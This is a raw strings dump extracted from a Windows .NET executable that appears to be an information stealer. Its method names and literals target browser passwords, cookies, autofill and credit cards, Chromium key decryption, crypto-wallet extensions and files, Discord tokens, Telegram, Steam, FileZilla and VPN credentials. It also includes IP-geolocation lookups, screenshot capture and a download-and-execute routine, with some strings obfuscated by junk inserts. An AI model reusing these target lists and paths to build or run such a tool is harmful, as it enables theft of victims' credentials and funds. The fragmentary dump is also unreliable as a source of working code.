!This program cannot be run in DOS mode.
`.rsrc
@.reloc
KDBM(s
Y _c
Y _c
v4.0.30319
#Strings
Q5F5/5959
3EEECA8C90CAA62AB5F9CCDD8715DA5023F4BA00
__StaticArrayInitTypeSize=10
GetHardwareStep10
__StaticArrayInitTypeSize=20
359A00EF6C789FD4C18644F56C5D3F97453FFF20
GetHardwareStep20
__StaticArrayInitTypeSize=30
__StaticArrayInitTypeSize=40
7C9294BE6200FF78DBFFD78FF8899846A7C82760
77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
__StaticArrayInitTypeSize=70
A8F9B62160DF085B926D5ED70E2B0F6C95A25280
92F8B9C6A2A37E4D27223A4BE886A8D110612990
__StaticArrayInitTypeSize=90
F413CEA9BAA458730567FE47F57CC3C94DDF63C0
<>9__0_0
<Scan>b__0_0
<.ctor>b__0_0
<DistinctBy>b__0_0
<>c__DisplayClass0_0
<GetWindowsVersion>g__HKLM_GetString|11_0
<>9__1_0
<Run>b__1_0
<>c__DisplayClass1_0
<>9__3_0
<ContainsDomains>b__3_0
<>9__5_0
<GetScanArgs>b__5_0
<>9__8_0
<ListOfPrograms>b__8_0
<>9__9_0
<AvailableLanguages>b__9_0
<.cctor>b__0
2FBDC611D3D91C142C969071EA8A7D3D10FF6301
GetHardwareStep11
GetHardwareStep21
855FED6E03442FBB3AF914FFBFA9DA82813817A1
989657DD93570810E43C5B1F68E529460CA796F1
<>9__3_1
<ContainsDomains>b__3_1
<Scan>b__1
Func`1
IEnumerable`1
IOrderedEnumerable`1
ICollection`1
IEnumerator`1
IList`1
ChannelFactory`1
GetHardwareStep1
1674D4347598B476FA761898A499DB4C02053102
__StaticArrayInitTypeSize=102
__StaticArrayInitTypeSize=12
GetHardwareStep12
__StaticArrayInitTypeSize=22
__StaticArrayInitTypeSize=32
Microsoft.Win32
ToUInt32
ToInt32
A937C899247696B6565665BE3BD09607F49A2042
__StaticArrayInitTypeSize=42
__StaticArrayInitTypeSize=152
__StaticArrayInitTypeSize=52
C870F92F620E60CAA51A5D7E3D77C55576D20862
__StaticArrayInitTypeSize=62
__StaticArrayInitTypeSize=72
3F6BA22DF7E6EB52DA3166FB3020D155A2776ED2
D67333042BFFC20116BF01BC556566EC76C6F7E2
EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
<>9__0_2
<Scan>b__0_2
<>c__0`2
Func`2
IGrouping`2
KeyValuePair`2
Dictionary`2
GetHardwareStep2
04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
GetHardwareStep13
EB14352FBADB40E2FA237D444A6575B918573C43
5AC5D01D531EDFB3707A50A2476ABF6A4D050763
2ADC9207E27E1E7B3C16C7A8A6F212757DCFE863
4E3D7F188A5F5102BEC5B820632BBAEC26839E63
387D8DBBFB12BA323F1E0F1F539B4DA9550070C3
8D47DE3FB22B40C72F6EC333F40C80E5B29C87D3
C39241F447680C35D3966F9446AAE6D462E04AD3
79E9B68FB6E1987DED749BCD71143BD8EB323CE3
<Scan>b__3
GetHardwareStep3
4EF472E2E74116C7FD95C74AB422CCF80DB1C404
__StaticArrayInitTypeSize=14
GetHardwareStep14
__StaticArrayInitTypeSize=124
__StaticArrayInitTypeSize=24
46884713B2F882E5304A1FF1B16370575A53E434
__StaticArrayInitTypeSize=34
__StaticArrayInitTypeSize=144
__StaticArrayInitTypeSize=64
FromBase64
ToInt64
67CD3B1DF0AD5BAEAA1ABDDA3FCAFB2EEBDD2684
24745D8330E61F986032C2034A579B0B80181594
5DCB9EAE4CEECF21F13DB2FBBE60A2FFC47453B4
1076B53156E190E9BCBE281016712F2D3F02D3B4
<>9__0_4
<Scan>b__0_4
GetHardwareStep4
get_IPv4
set_IPv4
EB2DB456E0D779E528D1474FA55AC99055A5E815
38F431A549411AEB32810068A4C83250B2D31E15
GetHardwareStep15
B14822E504AE1EF678AE0E823684D7B32F95A725
703C0129D2425B4E51361C24EBE8A0042E483AC5
2A92E2F98903398CD12F10BDF583F44C2C6EEBF5
<Scan>b__5
GetHardwareStep5
__StaticArrayInitTypeSize=16
GetHardwareStep16
E0CEB3E46E857A70CFB575A05B01A64806A8D426
5E52C12E6FD3BB7F2A02D01E80229C758C55CC26
__StaticArrayInitTypeSize=46
__StaticArrayInitTypeSize=56
__StaticArrayInitTypeSize=76
7390CD62F6A65F4FB819D675F451B41EE1790C96
__StaticArrayInitTypeSize=6
80E5A0A2B81DB2473AFBB3FDD6F479670B7B41C6
0E5921723BD3C6CB75662A156FB56AF05A7152C6
<>9__0_6
<Scan>b__0_6
GetHardwareStep6
508209E11F4027EB3115950926B6AA24E91A3607
GetHardwareStep17
3F97CA5BE7FE9C129528F72AF4DFC001E9A3D047
D3E21E15607F5CF9027C28EA14C124E278E3D957
FB77AA8CDAF4D2192696350B7AB546B533467477
68F2A1E3776E8F2B096767D7A710103E13D9CE77
18B532EF2959EF2ED8C549D712E3446FF49E4287
4062BDAE12A3F6A735FAD41F5A4EA518A1C50B87
C961283A536D49979AAD11F7BC192F2ACA8D3B97
007A56C60CB686C542C5A63F4806094A4F9494B7
89C95FB6F8086AFCCD50B1B257669F2B17C047B7
B322AF50AA029F1E4D2A68F4003EFBC9BE2A0FB7
D82572C56BDDD62E320B8BDAF0397A0DF9DD5BF7
<Scan>b__7
GetHardwareStep7
__StaticArrayInitTypeSize=18
GetHardwareStep18
__StaticArrayInitTypeSize=28
__StaticArrayInitTypeSize=38
__StaticArrayInitTypeSize=48
__StaticArrayInitTypeSize=58
A9B6DE7C485B3014653A30C8B4BEFA8F70610178
__StaticArrayInitTypeSize=78
00D675BCFF1D9FECDD0CA29C78CB6A24748C8788
DF08DD4DFFDB6C9048202CAE65882EF91ECE6BA8
9B88C78E81ADB9E7247AB37D1F5F3861810916D8
46F273EF641E07D271D91E0DC24A4392582671F8
get_UTF8
<>9__0_8
<Scan>b__0_8
GetHardwareStep8
GetHardwareStep19
20CB5B8963ECE3D796594F043D66C0E0BAD86669
2B9522D4F7398AB5DB789596FE5DB90589B031E9
GetHardwareStep9
<Module>
<PrivateImplementationDetails>
8743F6DD6877BBC815E9F16BEC59057DD1A89B0A
96D6CB223DCF17F7C9F93C825239BDAA3634674A
2316CD4437753407AB3145F64521DD135A4F1F4A
FE79FF373808574898C82AC1320C55C1182FB75A
A3EFD00EA085079EE7F97407F8EFF07E3990696A
4C1117B01D5C4E103EE817F889EC547C63B47B7A
A9139732ED4CF84F8CE948DCB134114E4F24598A
57F4CB785574C3A09AF99937BF91EA2C31E37C8A
BEDDFAEB0360B1694AB8CD2A69986414790A1D9A
E63C93C721909983D6276C980CFF923987A4D2AA
D3DCBB25544C46B48A1F93C97090361F54FE88BA
4CDA4454A3C36A7EBDCF8FE8B804B379A31D33CA
085EF559935ACAE54FCEBE778C7DE9948289EEDA
A8A5F2DC86E781EC7360D1DDBE09F80EEECE48EA
MessageBoxA
EBD075615CBE4A710F9410FFECEAF6110A01922B
9D9AF3AE11A58D55EB8A6AEC8F03F7AD01E8994B
5BB3788A197C26B8310159EC9A81635814ABB05B
0410277C15CAD5E63A25F491DAEEF493B897678B
81E046FA1D93B661CC948A4DD1E01F20D6192E9B
3D8123EB7B42B02A966BA40985475548B40BE5AB
C58D707276695E733863DD82C6DF4DF66A3AD49C
get_CC
set_CC
ScanCC
5F2F91D44A21E42A979E24B620CF42F2CB8687EC
System.Drawing.Drawing2D
FD4C77C0C4405C6A46E5C3CE53E0AE6BAEE7746D
B5B4FA236B87DBCD8055443F05776B10DDEFA5CD
get_ReleaseID
set_ReleaseID
get_TaskID
set_TaskID
6F66485AF823BAE1F185740DA7F4F595701CD22E
571B1023DF3ABFB94C92465B365B1814FEBFAB3E
4956BACC797B0C6C013C7E4846581396C9EF0D8E
459812D18B50C8E5F96831EFD700F962F692D29E
71E427369E07185AE0407E3FAB1A16ED62BD159E
EE4BBE44D57B0465CF2328FB6D7FD1CF1478A9AE
95098CDF929872F9B67E58070D088F8238F7CABE
CE18B047107AA23D1AA9B2ED32D316148E02655F
17C588718030CA902BC760013FE165199AD1C85F
4B05CEBD7D70F1607D474CAE176FEAEB7439795F
E705C6345C26AF82E64D22DBE44B2A3514F2F06F
8C49F78A06E711CF0E21134D0B091985336CC37F
501BADE98ACDE8BF4A0424FD9A4354615FF08C7F
D7DC31ED4320E74979DEC780486CF9586470608F
B14D74C51EAE4F88FBF39B8BD07DA392799FCAAF
3DB6DAD76E13B54DC03AF1C6092C40388E57FBBF
get_ASCII
get_URL
set_URL
TotalOfRAM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
get_JSON
FromJSON
ToJSON
get_ScanVPN
set_ScanVPN
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
get_IP
set_IP
get_BlockedIP
set_BlockedIP
get_ScanFTP
set_ScanFTP
DESKTOPVERTRES
BCRYPT_KEY_LENGTHS_STRUCT
value__
FileZilla
cbData
DownloadData
ProtectedData
bEncryptedData
cbAuthData
pbAuthData
mscorlib
DecryptBlob
ReleaseHdc
GetHdc
Graphic
System.Collections.Generic
updateId
pszAlgId
taskId
get_SessionId
set_MaxBytesPerRead
Thread
Download
managed
BytesToStringConverted
<IPv4>k__BackingField
<CC>k__BackingField
<ReleaseID>k__BackingField
<TaskID>k__BackingField
<URL>k__BackingField
<ScanVPN>k__BackingField
<IP>k__BackingField
<BlockedIP>k__BackingField
<ScanFTP>k__BackingField
<ScanDiscord>k__BackingField
<Password>k__BackingField
<PostalCode>k__BackingField
<ZipCode>k__BackingField
<geoplugin_countryCode>k__BackingField
<postal_code>k__BackingField
<country_code>k__BackingField
<geoplugin_longitude>k__BackingField
<geoplugin_latitude>k__BackingField
<Language>k__BackingField
<NameOfFile>k__BackingField
<PathOfFile>k__BackingField
<DirOfFile>k__BackingField
<BrowserProfile>k__BackingField
<Name>k__BackingField
<MachineName>k__BackingField
<HolderName>k__BackingField
<BrowserName>k__BackingField
<Username>k__BackingField
<TimeZone>k__BackingField
<HardType>k__BackingField
<Hardware>k__BackingField
<SeenBefore>k__BackingField
<Secure>k__BackingField
<Value>k__BackingField
<Recoursive>k__BackingField
<ScreenSize>k__BackingField
<Tag>k__BackingField
<TaskArg>k__BackingField
<Path>k__BackingField
<Month>k__BackingField
<ScanSteam>k__BackingField
<ScanTelegram>k__BackingField
<ScanScreen>k__BackingField
<Open>k__BackingField
<geoplugin_region>k__BackingField
<Version>k__BackingField
<OSVersion>k__BackingField
<NameOfApplication>k__BackingField
<Location>k__BackingField
<FileLocation>k__BackingField
<Action>k__BackingField
<Proton>k__BackingField
<Pattern>k__BackingField
<ip>k__BackingField
<Http>k__BackingField
<Year>k__BackingField
<Number>k__BackingField
<NameOfBrowser>k__BackingField
<DomainFilter>k__BackingField
<Counter>k__BackingField
<Monitor>k__BackingField
<AvailableLanguages>k__BackingField
<Cookies>k__BackingField
<ScannedFiles>k__BackingField
<ScanFiles>k__BackingField
<GameLauncherFiles>k__BackingField
<GameChatFiles>k__BackingField
<MessageClientFiles>k__BackingField
<SystemHardwares>k__BackingField
<Softwares>k__BackingField
<Expires>k__BackingField
<Processes>k__BackingField
<PassedPaths>k__BackingField
<ScanFilesPaths>k__BackingField
<ScanChromeBrowsersPaths>k__BackingField
<ScanGeckoBrowsersPaths>k__BackingField
<ScanDetails>k__BackingField
<SecurityUtils>k__BackingField
<Autofills>k__BackingField
<Logins>k__BackingField
<Actions>k__BackingField
<FtpConnections>k__BackingField
<Browsers>k__BackingField
<InstalledBrowsers>k__BackingField
<ScanBrowsers>k__BackingField
<TaskProcessors>k__BackingField
<ScannedWallets>k__BackingField
<ScanWallets>k__BackingField
<NordAccounts>k__BackingField
<Result>k__BackingField
<os_crypt>k__BackingField
<geoplugin_request>k__BackingField
<Host>k__BackingField
<Body>k__BackingField
<encrypted_key>k__BackingField
<Directory>k__BackingField
<Country>k__BackingField
<BlockedCountry>k__BackingField
<City>k__BackingField
<geoplugin_city>k__BackingField
RecordHeaderField
ReadToEnd
Append
CreateBind
FromHwnd
method
get_ScanDiscord
set_ScanDiscord
get_Password
set_Password
Replace
IsNullOrWhiteSpace
serviceInterfacce
cbNonce
pbNonce
source
get_PostalCode
set_PostalCode
get_ZipCode
set_ZipCode
get_geoplugin_countryCode
set_geoplugin_countryCode
set_Mode
set_SmoothingMode
chainingMode
set_InterpolationMode
set_TransferMode
set_PixelOffsetMode
BasicHttpSecurityMode
SelectSingleNode
XmlNode
xmlNode
get_postal_code
set_postal_code
get_country_code
set_country_code
get_Unicode
get_BigEndianUnicode
get_geoplugin_longitude
set_geoplugin_longitude
get_geoplugin_latitude
set_geoplugin_latitude
FromImage
ShowMessage
percentage
get_Language
set_Language
get_CurrentInputLanguage
AddRange
ScannedCookie
EndInvoke
BeginInvoke
ReadTable
ReadMasterTable
IEnumerable
IDisposable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
ScannedFile
get_NameOfFile
set_NameOfFile
get_PathOfFile
set_PathOfFile
get_DirOfFile
set_DirOfFile
CopyFile
get_BrowserProfile
set_BrowserProfile
profile
OpenVPNRule
ProtonVPNRule
XMRRule
GuardaRule
AtomicRule
DiscordRule
EthRule
CoinomiRule
ElectrumRule
DesktopMessangerRule
GameLauncherRule
FileScannerRule
BrowserExtensionsRule
AllWalletsRule
ExodusRule
JaxxRule
ArmoryRule
get_Name
set_Name
fieldName
tableName
set_FileName
lpExistingFileName
GetTempFileName
lpNewFileName
fileName
get_MachineName
set_MachineName
GeckoRoamingName
ChromeGetRoamingName
get_EnglishName
GeckoLocalName
ChromeGetLocalName
get_FullName
ItemName
get_UserDomainName
get_HolderName
set_HolderName
get_BrowserName
set_BrowserName
ChromeGetName
GetProcessesByName
get_DisplayName
tmpFilename
filename
get_Username
set_Username
DateTime
Chrome
get_NewLine
Combine
LocalMachine
get_TimeZone
set_TimeZone
DataProtectionScope
dataProtectionScope
pszBlobType
get_HardType
set_HardType
ChangeType
HardwareType
ValueType
SecurityProtocolType
Compare
get_Hardware
set_Hardware
SystemHardware
System.Core
get_SeenBefore
set_SeenBefore
get_Secure
set_Secure
get_Culture
get_InvariantCulture
WebResponse
GetResponse
Dispose
TryParse
X509Certificate
certificate
DownloadUpdate
CommandLineUpdate
DownloadAndExecuteUpdate
OpenUpdate
VerifyUpdate
Create
MulticastDelegate
LocalState
Delete
CompilerGeneratedAttribute
UnverifiableCodeAttribute
DebuggableAttribute
TargetFrameworkAttribute
ExtensionAttribute
SecurityPermissionAttribute
DataMemberAttribute
EnumMemberAttribute
CompilationRelaxationsAttribute
DataContractAttribute
ServiceContractAttribute
OperationContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ImageToByte
get_Value
set_Value
ParseValue
GetValue
get_Recoursive
set_Recoursive
Remove
Raxes.exe
get_Size
cbSize
_pageSize
set_MaxReceivedMessageSize
_sqlDataTypeSize
MaxAuthTagSize
set_MaxBufferPoolSize
get_ScreenSize
set_ScreenSize
set_MaxBufferSize
Serialize
Deserialize
SuppressFinalize
Resize
SizeOf
get_ItemOf
IndexOf
get_Tag
set_Tag
authTag
get_Png
System.Threading
BasicHttpBinding
_dbEncoding
GetEncoding
System.Drawing.Imaging
System.Runtime.Versioning
DownloadString
ToString
GetString
GetHexString
Substring
System.Drawing
ConvertToULong
get_TaskArg
set_TaskArg
FileScannerArg
scannerArg
GetMd5Hash
ComputeHash
get_Path
set_Path
profilePath
GetFolderPath
rootPath
get_Width
get_Length
dwMinLength
set_MaxJsonLength
set_MaxStringContentLength
get_RowLength
dwMaxLength
set_MaxArrayLength
StartsWith
get_Month
set_Month
set_MaxDepth
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
OpenLink
EnumCook
ScanCook
UpdateTask
updateTask
TryCompleteTask
AllocHGlobal
FreeHGlobal
get_Local
Marshal
System.Security.Principal
cbLabel
pbLabel
System.ServiceModel
CreateChannel
IClientChannel
maxLevel
gdi32.dll
kernel32.dll
user32.dll
bcrypt.dll
Autofill
System.Xml
get_SecurityProtocol
set_SecurityProtocol
GetResponseStream
MemoryStream
get_ScanSteam
set_ScanSteam
get_ScanTelegram
set_ScanTelegram
Program
get_Item
get_Is64BitOperatingSystem
phAlgorithm
HashAlgorithm
Random
RootNum
rowNum
DecryptChromium
TimeSpan
CopyFromScreen
get_ScanScreen
set_ScanScreen
get_PrimaryScreen
get_Open
set_Open
ProgramMain
X509Chain
GeoPlugin
get_geoplugin_region
set_geoplugin_region
get_OSVersion
set_OSVersion
get_Version
set_Version
get_FileVersion
dwInfoVersion
BrowserVersion
GetWindowsVersion
get_NameOfApplication
set_NameOfApplication
get_Location
set_Location
get_FileLocation
set_FileLocation
pszImplementation
System.Globalization
System.Runtime.Serialization
System.Web.Script.Serialization
get_Action
set_Action
IsValidAction
UpdateAction
SecurityAction
action
System.Reflection
InputLanguageCollection
MatchCollection
ManagementObjectCollection
DataBaseConnection
EndpointConnection
RequestConnection
SearchOption
searchOption
lpCaption
CryptographicException
GetDisplayResolution
StringComparison
get_Proton
set_Proton
get_Pattern
set_Pattern
CompareTo
FileInfo
fileInfo
TimeZoneInfo
CultureInfo
pPaddingInfo
FileSystemInfo
FileVersionInfo
GetVersionInfo
GeoInfo
ProcessStartInfo
DirectoryInfo
DeviceCap
Bitmap
ParsingStep
GetGeoStep
get_ip
set_ip
CopyToTemp
NordApp
get_Http
set_Http
System.Linq
get_Year
set_Year
RecoursiveFileGrabber
get_Number
set_Number
GetSerialNumber
XmlReader
StreamReader
XmlTextReader
MD5CryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
CryptoProvider
IFormatProvider
provider
StringBuilder
dataFolder
SpecialFolder
GetFolder
sender
Buffer
ServicePointManager
ManagementObjectSearcher
FileCopier
FileScanner
GeoHelper
SystemInfoHelper
CryptoHelper
DisplayHelper
ToUpper
CurrentUser
ScannedBrowser
get_NameOfBrowser
set_NameOfBrowser
get_DomainFilter
set_DomainFilter
get_Counter
set_Counter
BitConverter
TaskResolver
ToLower
JavaScriptSerializer
ITaskProcessor
IEnumerator
ManagementObjectEnumerator
GetEnumerator
GetWindowsScreenScalingFactor
.cctor
get_Monitor
set_Monitor
IntPtr
base64str
set_ReaderQuotas
XmlDictionaryReaderQuotas
Graphics
System.Diagnostics
Fields
get_Bounds
GetGraphicCards
ScanPasswords
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
get_ChildNodes
get_AvailableLanguages
set_AvailableLanguages
get_InstalledInputLanguages
Matches
get_Cookies
set_Cookies
MakeTries
EnumerateDirectories
GetDirectories
_masterTableEntries
_tableEntries
ExpandEnvironmentVariables
get_ScannedFiles
set_ScannedFiles
get_ScanFiles
set_ScanFiles
get_GameLauncherFiles
set_GameLauncherFiles
get_GameChatFiles
set_GameChatFiles
GetFiles
get_MessageClientFiles
set_MessageClientFiles
profiles
scannerRules
ExtensionNames
GetSubKeyNames
get_SystemHardwares
set_SystemHardwares
get_Softwares
set_Softwares
get_Expires
set_Expires
get_Processes
set_Processes
ListOfProcesses
System.Security.Cryptography.X509Certificates
ReleaseUpdates
GetUpdates
StripQuotes
FromMinutes
_fileBytes
ReadAllBytes
WriteAllBytes
GetBytes
ReplaceEmptyValues
GetLogicalDrives
dwFlags
settings
ScanningArgs
GetScanArgs
TryGetArgs
get_PassedPaths
set_PassedPaths
FindPaths
BrowserPaths
browserPaths
get_ScanFilesPaths
set_ScanFilesPaths
get_ScanChromeBrowsersPaths
set_ScanChromeBrowsersPaths
get_ScanGeckoBrowsersPaths
set_ScanGeckoBrowsersPaths
SetPaths
AddMonths
get_Ticks
remoteTasks
TryGetTasks
ScanCredentials
System.ServiceModel.Channels
get_ScanDetails
set_ScanDetails
get_SecurityUtils
set_SecurityUtils
GetFirewalls
ScanFills
get_Autofills
set_Autofills
ListOfPrograms
System.Windows.Forms
GetTokens
ContainsDomains
domains
Contains
get_Logins
set_Logins
System.Web.Extensions
System.Text.RegularExpressions
System.Security.Permissions
get_Actions
set_Actions
System.Collections
get_FtpConnections
set_FtpConnections
StringSplitOptions
searchPatterns
patterns
GetDeviceCaps
get_Chars
RuntimeHelpers
get_Browsers
set_Browsers
get_InstalledBrowsers
set_InstalledBrowsers
get_ScanBrowsers
set_ScanBrowsers
GetBrowsers
SslPolicyErrors
sslPolicyErrors
get_TaskProcessors
GetProcessors
success
GetCurrentProcess
EndpointAddress
set_ProxyAddress
address
get_ScannedWallets
set_ScannedWallets
get_ScanWallets
set_ScanWallets
GetArguments
get_NordAccounts
set_NordAccounts
get_Exists
bFailIfExists
arrays
Concat
ImageFormat
ManagementBaseObject
hObject
ICommunicationObject
ManagementObject
cbKeyObject
pbKeyObject
object
Select
Unprotect
System.Net
ReadTableFromOffset
offset
get_Height
WaitForExit
cbSalt
get_Result
pcbResult
IAsyncResult
ScanResult
__result
GetRecent
WebClient
System.Management
XmlElement
get_DocumentElement
dwIncrement
SqlStatement
Environment
XmlDocument
get_Current
GetCurrent
Content
IRemoteEndpoint
get_Count
set_MaxNameTableCharCount
GetRowCount
Account
OsCrypt
get_os_crypt
set_os_crypt
StringDecrypt
BCryptDecrypt
TrimStart
Convert
WebRequest
VerifyScanRequest
get_geoplugin_request
set_geoplugin_request
XmlNodeList
ToList
get_Host
set_Host
set_SendTimeout
set_CloseTimeout
set_ReceiveTimeout
set_OpenTimeout
cbInput
pbInput
cbOutput
pbOutput
MoveNext
System.Text
ReadAllText
lpText
cipherText
get_InnerText
chiperText
cbMacContext
pbMacContext
createdNew
get_Now
set_CreateNoWindow
DownloadAndEx
endIdx
startIdx
nIndex
startIndex
rowIndex
GroupBy
OrderBy
DistinctBy
InitializeArray
ToArray
FromBase64CharArray
ToCharArray
get_Body
set_Body
get_Key
OpenSubKey
chromeKey
ParseLocalStateKey
stringKey
bMasterKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
get_encrypted_key
set_encrypted_key
TryVerify
System.Security.Cryptography
GetExecutingAssembly
SelectMany
BlockCopy
CreateShadowCopy
entropy
ResultFactory
get_Directory
set_Directory
baseDirectory
CreateDirectory
set_WorkingDirectory
profilesDirectory
TableEntry
SqliteMasterEntry
get_Country
set_Country
get_BlockedCountry
set_BlockedCountry
Registry
get_City
set_City
get_geoplugin_city
set_geoplugin_city
op_Equality
op_Inequality
System.Security
System.Net.Security
set_Security
BasicHttpSecurity
WindowsIdentity
IsNullOrEmpty
IsEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
property
set_UseDefaultWebProxy
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
GetArguments
VerifyScanRequest
GetUpdates
VerifyUpdate
Endpoint1
AutofillT
Namespace
BrowserExtension7
ScannedBrowserT
Namespace
BrowserExtension6
ScannedCookieT
Namespace
BrowserExtension+
Namespace
BrowserExtension0
AccountT
Namespace
BrowserExtension
HardwareType
RemoteTaskAction5
ScanningArgsT
Namespace
BrowserExtension4
ScanDetailsT
Namespace
BrowserExtension7
SystemHardwareT
Namespace
BrowserExtension7
BrowserVersionT
Namespace
BrowserExtension4
ScannedFileT
Namespace
BrowserExtension3
UpdateTaskT
Namespace
BrowserExtension3
ScanResultT
Namespace
BrowserExtension
GeoPlugin
LocalState
OsCrypt
BrowserName
BrowserProfile
Logins
Autofills
Cookies
Secure
Expires
HolderName
Number
Username
Password
ScanBrowsers
ScanFiles
ScanFTP
ScanWallets
ScanScreen
ScanTelegram
ScanVPN
ScanSteam
ScanDiscord
ScanFilesPaths
BlockedCountry
BlockedIP#
ScanChromeBrowsersPaths"
ScanGeckoBrowsersPaths
SecurityUtils
AvailableLanguages
Softwares
Processes
SystemHardwares
Browsers
FtpConnections
InstalledBrowsers
ScannedFiles
GameLauncherFiles
ScannedWallets
Proton
MessageClientFiles
GameChatFiles
Counter
HardType
NameOfBrowser
Version
PathOfFile
NameOfFile
NameOfApplication
DirOfFile
TaskID
TaskArg
Action
DomainFilter
Hardware
ReleaseID
MachineName
OSVersion
Language
ScreenSize
ScanDetails
Country
TimeZone
Monitor
ZipCode
FileLocation
SeenBefore
geoplugin_request
geoplugin_city
geoplugin_region!
geoplugin_countryCode
geoplugin_latitude
geoplugin_longitude
postal_code
country_code
os_crypt
encrypted_key
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
6 =">0?@@CAFBKCOD^EbFhGkHl
Q%R&S&T(U*VIWIXIYIZI[I\I]I^I_I`IaIbIcIdIeIfIgIhIiIjIkIlImInIoIpIqIrIsItIuI
Environment
UNKNOWN
cmyredmyit_cmyardmys
Local State
LocalPrefs.json
%USESystemClearRPROFILE%\AppDaSystemClearta\LSystemClearocal
SystemClear
String.Replace
String.Remove
windows-1251
Microsoft Primitive Provider
ChainingModeGCM
AuthTagLength
ChainingMode
ObjectLength
KeyDataBlob
BCrypt.BCryptImportKey() failed with status code:{0}
BCrypt.BCryptGetProperty() (get size) failed with status code:{0}
BCrypt.BCryptGetProperty() failed with status code:{0}
http://
HyUvASA6GRQjHi5cHAsnDSIUP1MjMARaHyBTSQ==
CVIkQQwmAg0NE1JT
Panton
Yandex\YaAddon
*wallet*
Armory
\Armory
*.wallet
Atomic
\atomic
ffnbelfdoeiohenkjibnmadjiehjhajb
YoroiWallet
ibnejdfjmmkpcnlpebklmnkoeoihofec
Tronlink
jbdaocneiiinmjbjlgalhcelgbejmnid
NiftyWallet
nkbihfbeogaeaoehlefnkodbefgpgknn
Metamask
afbcbjpbpfadlkmhmclhkeeodmamcflc
MathWallet
hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase
fhbohimaelbohpjbbldcngcnapndodjp
BinanceChain
odbfpeeihdkbihmopkbjmoonfanlbfcl
BraveWallet
hpglfhgfnhbgpjdenjgmdgoeiappafln
GuardaWallet
blnieiiffboillknjnepogjhkgnoapac
EqualWallet
cjelfplplebdjjenllpjcblmjkfcffne
JaxxxLiberty
fihkakfobkmkjojpchpfgcmhfjnmnfpi
BitAppWallet
kncchdigobghenbbaddojjnnaogfppfj
iWallet
amkmjjmmflddogmhpjloimipbofnfjih
Wombat
UnknownExtension
Local Extension Settings
Coinomi
\Coinomi
Profile_
egram.exe
\Telegram Desktop\tdata
-*.lo--g
1*.1l1d1b
System.UI
File.IO
*.json
string.Replace
Guarda
\Guarda
\com.liberty.jaxx
MFStreamonerFStreamo
FStream
\MIOStreamoneIOStreamro\walleIOStreamts
IOStream
%USERPNokiaROFILE%\AppNokiaData\RoamiNokiang
Handler
%USERPFinderROFILE%\ApFinderpData\LocaFinderl
Finder
{0}x{1}
UNIQUE
https://api.ipify.org
https://icanhazip.com
https://wtfismyip.com/text
http://bot.whatismyipaddress.com/
http://checkip.dyndns.org
SELECT * FROM Win32_Processor
NumberOfCores
root\CIMV2
SELECT * FROM Win32_VideoController
AdapterRAM
ROWindowsServiceOT\SecurityCenteWindowsServicer2
ROWindowsServiceOT\SecurWindowsServiceityCenter
AntqueiresivirusProdqueiresuct
AntqueiresiSpyqueiresWareProdqueiresuct
FiqueiresrewallProqueiresduct
WindowsService
SELECT * FROM
queires
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Clients\StartMenuInternet
shell\open\command
Unknown Version
SELECT * FROM Win32_DiskDrive
SerialNumber
ExecutablePath
0 Mb or 0
SELECT * FROM Win32_OperatingSystem
TotalVisibleMemorySize
{0} MB or {1}
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Unknown
@autofillexpiraas21tion_yas21ear
ProfilesTotal of RAMhttps://api.ip.sb/geoip
%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentming
AppData\Local\
ProtonVPN
[^\u0020-\u007F]ProcessId
[A-Za-z\d]{24}\.[\w-]{6}\.[\w-]{27}
name_on_cardencrypted_value
https://ipinfo.io/ip%appdata%\
logins
{0}\FileZilla\recentservers.xml
%appdata%\discord\Local Storage\leveldb
\tdata
AtomicWalletv10
\EtFile.IOhereuFile.IOm\walFile.IOlets
ESystem.UItherSystem.UIeum
Electrumprofiles\Windows\
expiras21ation_moas21nth
user.config
{0}\FileZilla\sitemanager.xml
cookies.sqlite
\Program Files (x86)\
config
RoninWallet
displayName
host_key\Electrum\wallets
Name\Exodus\exodus.wallet
nanjmdknhkinifnkgdcggcfnhdaammmjtdata
expires_utc
ttp://checkip.amazonaws.com/\Program Data\
coMANGOokies.sqMANGOlite*ssfn*
Exodus
DisplayVersion
%localappdata%\
GuildWallet
OpHandlerenVPHandlerN ConHandlernect%DSK_23%cmd
Opera GXcookies
//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletTokens.txt
Web DataSteamPath
waasflleasft.datasf
CommandLine
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Cookies
is_secure
Software\Valve\SteamLogin Data
ID: isSecureNoDefrdDefVPNDefwaasflletasfMewCx
\Program Files\
Opera GX Stable
SELECT * FROM Win32_Process Where SessionId='
